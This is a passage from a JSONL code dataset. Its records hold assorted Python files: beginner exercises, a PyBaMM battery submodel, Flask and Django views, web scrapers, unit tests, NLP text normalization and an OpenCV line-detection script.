'/')\n\n","sub_path":"refunder/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"403459457","text":"n = [int(i) for i in input().split()]\n\nmin_n = n[0]\nmax_n = n[0]\n\nfor i in n:\n if i > max_n:\n max_n = i\n\n elif i < min_n:\n min_n = i\n\nmin_pos = n.index(min_n)\nmax_pos = n.index(max_n)\n\nn[min_pos] = max_n\nn[max_pos] = min_n\n\nprint(' '.join(str(i) for i in n))\n","sub_path":"students/stachowska_agata/lesson_05_lists/swap_min_and_max.py","file_name":"swap_min_and_max.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"14477941","text":"# db05.py\n\nimport sqlite3\nprint(\"번호,이름을 입력하세요\")\nno, name = input('---> ').split(',')\ndbcon = sqlite3.connect('test01.db')\ncursor = dbcon.cursor()\n###########################################\nsql = '''update T1 set name = ? where no = ? '''\ncursor.execute(sql,(name,int(no)))\ndbcon.commit()\n###########################################\ncursor.close()\ndbcon.close()\nprint(\"실행 완료\")\n\n\n","sub_path":"5day/db/db05.py","file_name":"db05.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"225323464","text":"#\n# Class for two-dimensional current collectors\n#\nimport pybamm\nfrom .base_current_collector import BaseModel\n\n\nclass SingleParticlePotentialPair(BaseModel):\n \"\"\"A submodel for Ohm's law plus conservation of current in the current collectors,\n which uses the voltage-current relationship from the SPM(e).\n\n Parameters\n ----------\n param : parameter class\n The parameters to use for this submodel\n\n\n **Extends:** :class:`pybamm.current_collector.BaseModel`\n \"\"\"\n\n def __init__(self, param):\n super().__init__(param)\n\n def get_fundamental_variables(self):\n\n phi_s_cn = pybamm.standard_variables.phi_s_cn\n phi_s_cp = pybamm.standard_variables.phi_s_cp\n\n variables = self._get_standard_potential_variables(phi_s_cn, phi_s_cp)\n\n # TO DO: grad not implemented for 2D yet\n i_cc = pybamm.Scalar(0)\n i_boundary_cc = pybamm.standard_variables.i_boundary_cc\n\n variables.update(self._get_standard_current_variables(i_cc, i_boundary_cc))\n\n return variables\n\n def set_algebraic(self, variables):\n\n param = self.param\n\n ocp_p_av = variables[\"Average positive electrode open circuit potential\"]\n ocp_n_av = variables[\"Average negative electrode open circuit potential\"]\n eta_r_n_av = variables[\"Average negative electrode reaction overpotential\"]\n eta_r_p_av = variables[\"Average positive electrode reaction overpotential\"]\n eta_e_av = variables[\"Average electrolyte overpotential\"]\n delta_phi_s_n_av = variables[\"Average negative electrode ohmic losses\"]\n delta_phi_s_p_av = variables[\"Average positive electrode ohmic losses\"]\n\n phi_s_cn = variables[\"Negative current collector potential\"]\n phi_s_cp = variables[\"Positive current collector potential\"]\n i_boundary_cc = variables[\"Current collector current density\"]\n v_boundary_cc = variables[\"Local current collector potential difference\"]\n\n # The voltage-current expression from the SPM(e)\n local_voltage_expression = (\n ocp_p_av\n - ocp_n_av\n + eta_r_p_av\n - eta_r_n_av\n + eta_e_av\n + delta_phi_s_p_av\n - delta_phi_s_n_av\n )\n\n self.algebraic = {\n phi_s_cn: pybamm.laplacian(phi_s_cn)\n - (param.sigma_cn * param.delta ** 2 / param.l_cn)\n * pybamm.source(i_boundary_cc, phi_s_cn),\n phi_s_cp: pybamm.laplacian(phi_s_cp)\n + (param.sigma_cp * param.delta ** 2 / param.l_cp)\n * pybamm.source(i_boundary_cc, phi_s_cp),\n i_boundary_cc: v_boundary_cc - local_voltage_expression,\n }\n\n def set_boundary_conditions(self, variables):\n\n phi_s_cn = variables[\"Negative current collector potential\"]\n phi_s_cp = variables[\"Positive current collector potential\"]\n\n param = self.param\n applied_current = param.current_with_time\n\n pos_tab_bc = -applied_current / (\n param.sigma_cp * param.delta ** 2 * param.l_tab_p * param.l_cp\n )\n\n self.boundary_conditions = {\n phi_s_cn: {\n \"left\": (pybamm.Scalar(0), \"Dirichlet\"),\n \"right\": (pybamm.Scalar(0), \"Neumann\"),\n },\n phi_s_cp: {\n \"left\": (pybamm.Scalar(0), \"Neumann\"),\n \"right\": (pos_tab_bc, \"Neumann\"),\n },\n }\n\n return variables\n\n def set_initial_conditions(self, variables):\n\n param = self.param\n applied_current = param.current_with_time\n phi_s_cn = variables[\"Negative current collector potential\"]\n phi_s_cp = variables[\"Positive current collector potential\"]\n i_boundary_cc = variables[\"Current collector current density\"]\n\n self.initial_conditions = {\n phi_s_cn: pybamm.Scalar(0),\n phi_s_cp: param.U_p(param.c_p_init, param.T_ref)\n - param.U_n(param.c_n_init, param.T_ref),\n i_boundary_cc: applied_current / param.l_y / param.l_z,\n }\n","sub_path":"pybamm/models/submodels/current_collector/single_particle_current_collector.py","file_name":"single_particle_current_collector.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"159551424","text":"from utils.GraphUtils import deep_grapher\nfrom utils.GraphUtils import graph_painter\nfrom utils.ArgMatcher import argmapper\nimport re\nfrom loaders.PMLoader import PMLoader as pm\n\n\ndef DB_PM_converter(deepbank):\n print(\"===================Start Deepbank-Predicate Matrix Matching===================\")\n argmapper.read(\".\\\\arg_matcher\")\n for sent in deepbank.keys():\n head, nodes, start_list, verb_list = deep_grapher(deepbank[sent][\"nodes\"], deepbank[sent][\"head\"],\n require_verb=True)\n reserve = False\n for node in verb_list:\n if node.cls.find(\"_v_\") != -1:\n if argmapper.getPBG(node.cls):\n if re.match(\"fn.\", pm.getFrame(argmapper.getPBG(node.cls))):\n reserve = True\n pbg = argmapper.getPBG(node.cls)\n for edge in node.succ:\n pbr = argmapper.getPBR(node.cls + \"-\" + edge[0])\n if pbr:\n if re.match(\"fn.\", pm.getFE(pbg, pbr)):\n edge[0] = pm.getFE(pbg, pbr)\n node.cls += \"-\" + pm.getFrame(pbg)\n\n if reserve:\n nodes_painter = []\n edges_painter = []\n for handle in nodes.keys():\n node = nodes[handle]\n if node.name is None:\n nodes_painter.append((handle, node.cls))\n else:\n nodes_painter.append((handle, node.cls + \"(\" + node.name + \")\"))\n for edge in node.succ:\n edges_painter.append((edge[0], handle, edge[1].handle))\n graph_painter(sent, deepbank[sent][\"src\"], nodes_painter, edges_painter)\n","sub_path":"backup/v2.0/utils/Converter.py","file_name":"Converter.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"493282280","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\nimport os\nimport unittest\nimport Nio as nio\n\nimport storage.files as files\n\n\nclass TestGetVariableByType(unittest.TestCase):\n\n def setUp(self):\n self.badFilename = '/tmp/fail.txt'\n self.missingVariable = 'missing'\n\n def testNioRaisesException(self):\n with self.assertRaises(Exception):\n files.getVariableByType(self.badFilename, 'time')\n \n def testTimeVariableNames(self):\n self.variableList = files.VARIABLE_NAMES['time']\n for variable in self.variableList:\n testFile = self.makeNioFile(variable)\n timeVariable = files.getVariableByType(testFile, 'time')\n os.remove(testFile)\n self.assertEqual(timeVariable, variable)\n \n def testLatitudeVariableNames(self):\n self.variableList = files.VARIABLE_NAMES['latitude']\n for variable in self.variableList:\n testFile = self.makeNioFile(variable)\n timeVariable = files.getVariableByType(testFile, 'latitude')\n os.remove(testFile)\n self.assertEqual(timeVariable, variable)\n\n def testLongitudeVariableNames(self):\n self.variableList = files.VARIABLE_NAMES['longitude']\n for variable in self.variableList:\n testFile = self.makeNioFile(variable)\n timeVariable = files.getVariableByType(testFile, 'longitude')\n os.remove(testFile)\n self.assertEqual(timeVariable, variable)\n\n def testTimeVariableMissing(self):\n testFile = self.make5VariableNioFile()\n testVariable = files.getVariableByType(testFile, 'time')\n os.remove(testFile)\n self.assertEqual(len(testVariable), 5)\n \n def makeNioFile(self, variableName):\n filename = '/tmp/good_%s.nc' % variableName\n f = nio.open_file(filename, 'w')\n f.create_dimension('test_dimension', 1)\n f.create_variable(variableName,'l',('test_dimension',))\n f.close()\n return filename\n \n def make5VariableNioFile(self):\n filename = '/tmp/5_variables.nc'\n f = nio.open_file(filename, 'w')\n f.create_dimension('dimension_one', 1)\n f.create_variable('one', 'l', ('dimension_one',))\n f.create_variable('two', 'l', ('dimension_one',))\n f.create_variable('three', 'l', ('dimension_one',))\n f.create_variable('four', 'l', ('dimension_one',))\n f.create_variable('five', 'l', ('dimension_one',))\n f.close()\n return filename\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"rcmet/src/main/python/tests/test_files.py","file_name":"test_files.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"194642800","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\n\ndef make_section_url(num):\n url1 = \"https://www.incometaxindia.gov.in/_layouts/15/dit/Pages/viewer.aspx?grp=Act&cname=CMSID&cval=\"\n url2 = '&searchFilter=[{\"CrawledPropertyKey\":1,\"Value\":\"Act\",\"SearchOperand\":2},{\"CrawledPropertyKey\":0,\"Value\":\"Income-tax Act, 1961\",\"SearchOperand\":2},{\"CrawledPropertyKey\":29,\"Value\":\"2021\",\"SearchOperand\":2}]&k=&IsDlg=0'\n url = url1 + num + url2\n return url\n\n\nclass Section:\n def __init__(self, section_number, section_title, section_text):\n self.section_number = section_number\n self.section_code = 0\n self.section_text = section_text\n self.section_title = section_title\n\n def get_section_text(self):\n driver = webdriver.Firefox()\n driver.get(url=make_section_url(self.section_code))\n div = driver.find_element_by_class_name(\"viewerContent\")\n print(div.text)\n driver.quit()\n return div.text\n\n def set_section_text(self, text):\n self.section_text = text\n\n def display(self):\n print(f\"Section - {self.section_number}\")\n print(f\"Title - {self.section_title}\")\n # print(self.section_text)\n","sub_path":"section.py","file_name":"section.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"602027314","text":"#!/Users/lyjsmac/opt/anaconda3/bin/python3.8\n# -*- encoding: utf-8 -*-\n'''\n@File : 两数之和.py\n@Time : 2021/1/4 10:45 上午\n@Author : little_carp\n@Contact : woshiliyujian@gmail.com\n@Desc : None\n'''\n\n# here put the import lib\n'''\n给定一个整数数组 nums和一个整数目标值 target,请你在该数组中找出 和为目标值 的那两个整数,并返回它们的数组下标。\n\n你可以假设每种输入只会对应一个答案。但是,数组中同一个元素不能使用两遍。\n\n��可以按任意顺序返回答案。\n\n\n\n示例 1:\n\n输入:nums = [2,7,11,15], target = 9\n输出:[0,1]\n解释:因为 nums[0] + nums[1] == 9 ,返回 [0, 1] 。\n\n'''\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n # 最终返回的是x 和y的索引位置\n hash_map={}\n for loc,num in enumerate(nums):\n hash_map[num] = loc\n for i ,num in enumerate(nums):\n j = hash_map.get(target-num)\n if j is not None and i != j:\n return[i,j]\n","sub_path":"Week_05/两数之和.py","file_name":"两数之和.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"32226444","text":"# -*- encoding: utf-8 -*-\n\nfrom Projects.JJLAutoTest.Base.JJLAutoTest import JJLAutoTest\nfrom Projects.JJLAutoTest.Pages.InstitutionHomePage import InstitutionHomePage\nfrom Core.Decorator import test_case\nfrom DB.DBFactory import DBFactory\nfrom Core.ConfigOperation import ConfigOperation\nfrom Core.Log import log\nimport time\n\n@test_case\ndef institution_home_review(*args, **kwargs):\n \"\"\"\n 机构信息编辑提交审核\n :param args: 0: project\n :param kwargs:\n institution_name:机构名称\n contact_name:联系人名称\n contact_mobile:联系电话\n contact_address:联系地址\n business_image:营业执照\n other_image:委托授权书\n :return:\n \"\"\"\n # page初始化\n uh = InstitutionHomePage(args[0])\n user_url = 'http://org.dxzjjl.cn/org-center'\n # Mysql初始化\n env = 'AUTO'\n config = ConfigOperation().load_config('./Projects/JJLAutoTest/Base/config.ini')\n db = DBFactory().get_db_instance(db_type='Mysql', config=config, env=env)\n db.__connection__()\n # 1.打开机构院校首页\n uh.JJLAutoTest.open_url(user_url)\n # 2.输入待审核信息\n ch_name_input = uh.institution_name_input.get_attribute('placeholder')\n ch_contact_name_input = uh.institution_contact_name_input.get_attribute('placeholder')\n ch_contact_mobile_input = uh.institution_contact_mobile_input.get_attribute('placeholder')\n ch_contact_address_input = uh.institution_contact_address_input.get_attribute('placeholder')\n uh.set_institution_name_input_action(kwargs['institution_name'])\n uh.set_institution_contact_name_input_action(kwargs['contact_name'])\n uh.set_institution_contact_mobile_input_action(kwargs['contact_mobile'])\n uh.set_institution_contact_address_input_action(kwargs['contact_address'])\n # 上传营业执照\n uh.set_institution_business_license_push_input_action(kwargs['business_image'])\n # 上传委托授权书\n uh.set_institution_business_other_push_input_action(kwargs['other_image'])\n uh.JJLAutoTest.wait_until(uh._institution_attorney_picture_tag)\n # 点击提交审核\n uh.click_institution_submit_review_button_action()\n # 提交成功标志\n # uh.JJLAutoTest.wait_until(uh._message_content_tag)\n success_content = uh.message_content.get_attribute('textContent')\n # 信息验证\n result = {'ch_name_input': ch_name_input,\n 'ch_contact_name_input': ch_contact_name_input,\n 'ch_contact_mobile_input': ch_contact_mobile_input,\n 'ch_contact_address_input': ch_contact_address_input,\n 'success_content': success_content\n }\n\n return result","sub_path":"Projects/JJLAutoTest/TestCases/InstitutionHomeReview.py","file_name":"InstitutionHomeReview.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"437835347","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom callreplayapp import views\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', views.home, name='home'),\n url(r'^voice/$', views.voice, name='voice'),\n url(r'^respond/$', views.respond, name='respond'),\n url(r'^replay/(?P<pk>[0-9]+)/$', views.replay, name='replay'),\n url(r'^read/(?P<digits>[0-9]+)/', views.read, name='read')\n\n]\n","sub_path":"phonebuzz4/phonebuzz4/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"117100975","text":"import pke\nfrom textblob import TextBlob\nimport unicodedata\nimport nltk\nimport re\nimport inflect\n\nfrom gensim.summarization import summarize\nfrom gensim.summarization import keywords\n\n\ndef main():\n filename_rare = '../data_storage/articles_txt/facebook_ceo/facebook_ceo_rare.txt'\n filename_norm = '../data_storage/articles_txt/facebook_ceo/facebook_ceo.txt'\n\n rare_data = load_data(filename_rare)\n\n summary = summarize(rare_data)\n\n print(keywords(summary))\n\n\n # analyse_sentiment(rare_data)\n\n # normalized_data = normalize_text(rare_data)\n\n # save_data(filename_norm, normalized_data)\n\n\n\n# # # ==================================\n\n\n# print('\\n')\n# # define the set of valid Part-of-Speeches\n# pos = {'NOUN', 'PROPN', 'ADJ'}\n\n# # 1. create a TextRank extractor.\n# extractor = pke.unsupervised.TextRank()\n\n# # 2. load the content of the document.\n# extractor.load_document(input=FILENAME_RARE,\n# language='en',\n# normalization=None)\n\n# # 3. build the graph representation of the document and rank the words.\n# # Keyphrase candidates are composed from the 33-percent\n# # highest-ranked words.\n# extractor.candidate_weighting(window=3,\n# pos=pos,\n# top_percent=0.33, normalized=False)\n\n# # 4. get the 10-highest scored candidates as keyphrases\n# keyphrases = extractor.get_n_best(n=20)\n\n\n# print('\\n')\n# for keyphrase in keyphrases:\n# analyser = TextBlob(keyphrase[0])\n# print(keyphrase[0], ' = ', analyser.sentiment.polarity)\n\n# ===============================\n\ndef load_data(filename):\n file_id = open(filename)\n data = file_id.read()\n file_id.close()\n\n return data\n\ndef save_data(filename, data):\n file_id=open(filename, 'w')\n file_id.write(' '.join(data))\n file_id.close()\n\n# ===============================\n\ndef normalize_text(rare_text):\n # Each word as array element\n words_array = rare_text.split()\n\n words_array = remove_non_ascii(words_array)\n words_array = change_to_lowercase(words_array)\n words_array = remove_punctuation(words_array)\n words_array = replace_numbers(words_array)\n words_array = remove_stopwords(words_array)\n words_array = stem_words(words_array)\n print(words_array[:100])\n\n words_array = lemmatize_verbs(words_array)\n\n return words_array\n\ndef remove_non_ascii(words):\n \"\"\"Remove non-ASCII characters from list of tokenized words\"\"\"\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n\n return new_words\n\ndef change_to_lowercase(words):\n \"\"\"Convert all characters to lowercase from list of tokenized words\"\"\"\n new_words = []\n for word in words:\n new_word = word.lower()\n new_words.append(new_word)\n\n return new_words\n\ndef remove_punctuation(words):\n \"\"\"Remove punctuation from list of tokenized words\"\"\"\n new_words = []\n for word in words:\n new_word = re.sub(r'[^\\w\\s]', '', word)\n if new_word != '':\n new_words.append(new_word)\n\n return new_words\n\ndef replace_numbers(words):\n \"\"\"Replace all interger occurrences in list of tokenized words with textual representation\"\"\"\n p = inflect.engine()\n new_words = []\n for word in words:\n if word.isdigit():\n new_word = p.number_to_words(word)\n new_words.append(new_word)\n else:\n new_words.append(word)\n return new_words\n\ndef remove_stopwords(words):\n \"\"\"Remove stop words from list of tokenized words\"\"\"\n new_words = []\n for word in words:\n if word not in nltk.corpus.stopwords.words('english'):\n new_words.append(word)\n return new_words\n\ndef stem_words(words):\n \"\"\"Stem words in list of tokenized words\"\"\"\n stemmer = nltk.stem.LancasterStemmer()\n stems = []\n for word in words:\n stem = stemmer.stem(word)\n stems.append(stem)\n return stems\n\ndef lemmatize_verbs(words):\n \"\"\"Lemmatize verbs in list of tokenized words\"\"\"\n lemmatizer = nltk.stem.WordNetLemmatizer()\n lemmas = []\n for word in words:\n lemma = lemmatizer.lemmatize(word, pos='v')\n lemmas.append(lemma)\n\n return lemmas\n\n# ===============================\n\ndef analyse_sentiment(data):\n analyser = TextBlob(data)\n print(analyser.sentiment)\n\nmain()","sub_path":"src/diploma_project/nlp_module/text_rank.py","file_name":"text_rank.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"466250884","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('project_info', '0013_auto_20141127_1229'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Contact',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('contact_name', models.CharField(max_length=40)),\n ('contact_email', models.EmailField(max_length=75)),\n ('telephone_number', models.DecimalField(max_digits=15, decimal_places=0)),\n ('address', models.CharField(max_length=200)),\n ('project_email', models.EmailField(max_length=75)),\n ('institutions', models.TextField()),\n ('map', models.ImageField(upload_to=b'')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"project_info/migrations/0014_contact.py","file_name":"0014_contact.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"372131963","text":"from scipy import fft\nfrom numpy import *\nfrom matplotlib.pyplot import *\nimport pdb\ndef plotgr(vf):\n '''the realtion between vf and nonlocality.'''\n N=500\n k=linspace(-pi,pi,N)\n gk=sqrt(1+vf**2)/(1-vf*k+1j*1e-2)\n gr=fft.ifft(gk)\n plot(arange(N),gr.real)\n ylim(-2,2)\n show()\n\ndef Uas(n,reverse=False):\n '''U is pulse like in realspace.'''\n if n==0:\n return -0.5 if reverse else 0.5\n return -1.j*(1-exp(1j*pi*n))/(2*pi*n)\n\ndef plotUas():\n N=200\n Nx=100\n x=linspace(0,1,Nx)\n nl=arange(-N,N+1)\n res=zeros(Nx,dtype=complex128)\n for n in nl:\n res+=exp(2j*pi*n*x)*Uas(n)\n plot(x,res.real)\n show()\n","sub_path":"topochain/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"586096874","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: CityNorth\n@file: common.py\n@time: 2020/11/30 15:01\n@desc: \n\"\"\"\n\nimport hashlib\n\ndef get_md5(url):\n if isinstance(url,str):\n url = url.encode(\"utf-8\")\n m = hashlib.md5()\n m.update(url)\n return m.hexdigest()\n\nif __name__ == \"__main__\":\n print(get_md5(\"https://news.cnblogs.com/n/page/17/\"))","sub_path":"AricelSpider/AricelSpider/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"118836338","text":"from flask import Flask, render_template, jsonify, request\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\nimport requests\n\n\napp = Flask(__name__)\n\nclient = MongoClient('localhost', 27017) # mongoDB는 27017 포트로 돌아갑니다.\ndb = client.dbsparta # 'dbsparta'라는 이름의 db를 만듭니다.\n\n\n## HTML을 주는 부분\n@app.route('/')\ndef home():\n return render_template('/index.html')\n\n@app.route('/memo', methods=['GET'])\ndef listing():\n # 1. 모든 document 찾기 & _id 값은 출력에서 제외하기\n articles = list(db.articles.find({}, {'_id': False}))\n \n # 2. articles라는 키 값으로 영화정보 내려주기\n return jsonify({\n 'result':'success',\n 'msg':'GET 연결되었습니다!',\n 'articles':articles\n })\n\n## API 역할을 하는 부분\n@app.route('/memo', methods=['POST'])\ndef saving():\n\t\t# 1. 클라이언트로부터 데이터를 받기\n posting_url = request.form['posting_url']\n posting_comment = request.form['posting_comment']\n\n print(posting_url, posting_comment)\n \n\t\t# 2. meta tag를 스크래핑하기\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\n data = requests.get(posting_url, headers=headers)\n soup = BeautifulSoup(data.text, 'html.parser')\n\n og_image = soup.select_one('meta[property=\"og:image\"]')\n og_title = soup.select_one('meta[property=\"og:title\"]')\n og_description = soup.select_one('meta[property=\"og:description\"]')\n\n article = {\n 'url': posting_url,\n 'comment': posting_comment,\n 'image': og_image['content'],\n 'title': og_title['content'],\n 'desc': og_description['content']\n }\n\n print(article)\n db.articles.insert_one(article)\n\n return jsonify({'result': 'success', 'msg':'POST 연결되었습니다!'})\n\t\t# 3. mongoDB에 데이터 넣기\n\nif __name__ == '__main__':\n app.run('0.0.0.0',port=5004,debug=True)","sub_path":"9Day/memo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"162584504","text":"from django.conf.urls import url\nfrom api.views import MovieCreateView, MovieDetailView, ReferencesView, ReferencesDetailView, controlReference, EditorReferencesView, \\\n TranslateReferencesView, ThesisReferencesView, BrochureReferencesView, AudioVisualReferencesView, DatabaseReferencesView, \\\n EncyclopediaReferencesView, MessageFromForumReferencesView, WebsiteReferencesView, NoAuthorReferencesView, SourceView, \\\n SourceDetailView, controlSource, getallthesisname, getalltitleofreferences\nurlpatterns = [\n url(r'^movies/$', MovieCreateView.as_view(), name='movies'),\n url(r'^references/$', ReferencesView.as_view(), name='movies'),\n url(r'^editorreferences/$', EditorReferencesView.as_view(), name='movies'),\n url(r'^translatereferences/$', TranslateReferencesView.as_view(), name='movies'),\n url(r'^thesisreferences/$', ThesisReferencesView.as_view(), name='movies'),\n url(r'^brochurereferences/$', BrochureReferencesView.as_view(), name='movies'),\n url(r'^audiovisualreferences/$', AudioVisualReferencesView.as_view(), name='movies'),\n url(r'^databasereferences/$', DatabaseReferencesView.as_view(), name='movies'),\n url(r'^encyclopediareferences/$', EncyclopediaReferencesView.as_view(), name='movies'),\n url(r'^messagefromforumreferences/$', MessageFromForumReferencesView.as_view(), name='movies'),\n url(r'^websitereferences/$', WebsiteReferencesView.as_view(), name='movies'),\n url(r'^noauthorreferences/$', NoAuthorReferencesView.as_view(), name='movies'),\n url(r'^source/$', SourceView.as_view(), name='movies'),\n url(r'^sourceControl/$', controlSource, name='movies'),\n url(r'^getallthesisname/$', getallthesisname, name='movies'),\n url(r'^getalltitleofreferences/$', getalltitleofreferences, name='movies'),\n url(r'^source/(?P<id>[0-9]+)$', SourceDetailView.as_view(), name='detail'),\n url(r'^movies/(?P<id>[0-9]+)$', MovieDetailView.as_view(), name='detail'),\n url(r'^references/(?P<id>[0-9]+)$', ReferencesDetailView.as_view(), name='detail'),\n url(r'^controlReference/', controlReference),\n]","sub_path":"movies/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"196636271","text":"from flask import (\n Blueprint,\n flash,\n redirect,\n request,\n url_for)\n\nfrom app.blueprints.contact.forms import ContactForm\n\ncontact = Blueprint('contact', __name__, template_folder='templates')\n\n@contact.route('/contact', methods=['GET', 'POST'])\ndef index():\n\n form = ContactForm( request.form ) # Create a new contact form\n if form.validate_on_submit(): # Differentiates between GET/POST request\n from app.blueprints.contact.tasks import deliver_contact_email\n\n\n email = request.form['email']\n message = request.form['message']\n\n deliver_contact_email.delay(email, message)\n # Log\n print(f\"contact.index Success. email={email} message={message}\")\n\n # flash(\"Thanks, we'll be in touch shortly.\", 'success')\n return \"form sucessfully submitted\"\n else:\n return form.get_errors(), 400\n","sub_path":"server/app/blueprints/contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"416306471","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 9 09:18:47 2020\r\n\r\n@author: pulme\r\n\"\"\"\r\n\r\n\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport random as rng\r\n\r\norg=cv2.imread('C:/Users/pulme/Downloads/Buoy.jpg')\r\nimg=cv2.cvtColor(org,cv2.COLOR_BGR2GRAY)\r\n#img=org[:,:,0]\r\ncv2.imshow(\"Img\",img)\r\nimg = cv2.GaussianBlur(img, (5,5), 0)\r\n#img = cv2.bilateralFilter(img,9,75,75)\r\n\r\nimg = cv2.adaptiveThreshold(img, 255,cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY_INV, 111, 12)\r\ncv2.imshow(\"Mean Thresh\", img)\r\nkernel = np.ones((9,9),np.uint8)\r\nerosion = cv2.erode(img,kernel,iterations = 2)\r\ndilation = cv2.dilate(erosion,kernel,iterations =2 )\r\n#opening = cv2.morphologyEx(dilation, cv2.MORPH_OPEN, kernel)\r\nedges = cv2.Canny(dilation, 190, 255)\r\ncv2.imshow(\"Canny\", edges)\r\n\r\nminLineLength = 5\r\nmaxLineGap = 5\r\nlines = cv2.HoughLinesP(edges,60,np.pi/180,300,minLineLength,maxLineGap)\r\nfor line in lines:\r\n x1,y1,x2,y2=line[0]\r\n cv2.line(org,(x1,y1),(x2,y2),(0,0,255),2)\r\n\r\n\r\n#lines = cv2.HoughLines(edges,10,np.pi/45,50)\r\n#for line in lines:\r\n# rho,theta=line[0]\r\n# a = np.cos(theta)\r\n# b = np.sin(theta)\r\n# x0 = a*rho\r\n# y0 = b*rho\r\n# x1 = int(x0 + 1000*(-b))\r\n# y1 = int(y0 + 1000*(a))\r\n# x2 = int(x0 - 1000*(-b))\r\n# y2 = int(y0 - 1000*(a))\r\n#\r\n# cv2.line(org,(x1,y1),(x2,y2),(0,255,0),2)\r\n\r\ncv2.imshow(\"Hough\",org)\r\n\r\n\r\n\r\n#contours, _ = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n##print(\"I count {} contours in this image\".format(len(contours)))\r\n##cons = org.copy()\r\n##cv2.drawContours(cons, contours, -1, (0, 255, 0), 2)\r\n##cv2.imshow(\"Contours\", cons)\r\n\r\n\r\n#contours_poly = [None]*len(contours)\r\n#boundRect = [None]*len(contours)\r\n#cir=[None]*len(contours)\r\n#area=[None]*len(contours)\r\n#def get_contour_center(contours):\r\n# M = cv2.moments(contours)\r\n# cx=-1\r\n# cy=-1\r\n# if (M['m00']!=0):\r\n# cx= int(M['m10']/M['m00'])\r\n# cy= int(M['m01']/M['m00'])\r\n# return cx, cy\r\n#for i, c in enumerate(contours):\r\n# area[i] = cv2.contourArea(c)\r\n## perimeter= cv2.arcLength(c, True)\r\n# contours_poly[i] = cv2.approxPolyDP(c, 3, True)\r\n# boundRect[i] = cv2.boundingRect(contours_poly[i])\r\n# cir[i] = get_contour_center(c)\r\n### \r\n#index=area.index(max(area))\r\n#drawing = np.zeros((edges.shape[0], edges.shape[1], 3), dtype=np.uint8) \r\n### #centers[i], radius[i] = cv.minEnclosingCircle(contours_poly[i])\r\n### \r\n### 